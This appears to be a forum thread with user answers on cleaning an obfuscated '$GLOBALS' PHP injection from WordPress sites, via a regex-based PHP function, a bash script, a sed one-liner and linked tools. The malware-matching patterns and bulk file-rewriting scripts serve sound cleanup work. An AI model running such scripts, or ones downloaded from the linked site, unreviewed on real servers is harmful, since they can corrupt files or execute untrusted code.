$Guard->cleanFiles('../wordpress/');
You would import code, point it to root of malware and update malware sample library until everything is clean.
Please, for more check here https://github.com/Pilskalns/Narnia-Guardian
OOP approach could be easy edited further to monitor if anything comes along again.

I write script to delete this malware.
function deleteMalware()
{
$directory_iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator(ABSPATH, RecursiveDirectoryIterator::SKIP_DOTS));
foreach($directory_iterator as $filename => $file)
{
if ($file->getExtension() !== "php") {
continue;
}
$content = file_get_contents($filename);
$reg = '/<\?\s*php\s*if\(!isset\(\$GLOBALS\[\"\\\\x61(.*?)-1;\s*\?>/s';
$count = 0;
$newContent = preg_replace ($reg, '', $content, -1, $count);
if($count === 1) {
file_put_contents ($filename, $newContent);
}
}
};
I hope it helps :)

One of my customers had exactly the same issue and we had to run trough it, we found that there might be several types of PHP files and not all of them starts the same,
all the above solutions would work only if all PHP files on your server starts with ?php, anything else would damage your files.
The solution we used (provided below) catches all infected PHP files on your server, backup them (with it original path),restoring them into it orig state, and also write a summary file with the result
It works great for my customer (about 21000~ PHP files scanned and fixed in 7min)
In order to use it copy the below code into file on your home directory
name the file php_fix.sh
Make it executable by typing
chmod +x php_fix.sh
and run it:
./php_fix.sh y
You may also download it from my site:
http://okgamestudio.com/sites/igal/php_fix.sh
#!/bin/bash
infected_files=0
fixed_files=0
DATE=`date +"%d-%m-%y %T"`
find . -name "*.php" |grep -v 2fix > php_files.dat
php_files=`cat php_files.dat |wc -l`
if [ ! `ls 2fix` ]
then
mkdir 2fix
fi
while read file_name
do
if [[ `head -1 $file_name |grep GLOBALS` ]]
then
if [[ $1 == "y" ]]
then
fixed_string=`head -1 $file_name |grep GLOBALS | awk -F"?>" '{print $3}'`
cp --parents $file_name 2fix/
sed -i "1s/.*/$fixed_string/" $file_name
#sed -i "1s/.*/\<\?php/" $file_name
#sed -i '1d' $file_namea
let fixed_files=$fixed_files+1
else
let infected_files=$infected_files+1
fi
fi
done < php_files.dat
echo $DATE, "Scannded files:" $php_files, "Fixed files:" $fixed_files, "Infected: " $infected_files >> fixed_files.dat
exit
# head -1 $file_name |grep GLOBALS | awk -F"?>" '{print $3}'

I forked Narnia-Guardian for easy use and bugfix.
Download WordpressGuardian source code https://github.com/liruqi/WordpressGuardian
Backup your affected wordpress copy
bash NarniaGuardian.sh [path to wordpress root]
Find suspicious/malicious long-line unreable code, update pattern in blacklist.txt
Go back to step 2
This can clean up injected code.
Another possible approch is to find long lines in PHP file. And remove them or replace them with <?php if needed.

Using sed -i.bak 's/^<\?php if(!isset($GLOBALS\[.*-1; \?>//' *.php is working for me. Essentially just replacing -e with -i.bak

I had once to deal with this problem and I finally had to create an script to remove all lines from the /var/www directory.
You can see here https://stackoverflow.com/a/26285498/3000681
regards.

Categories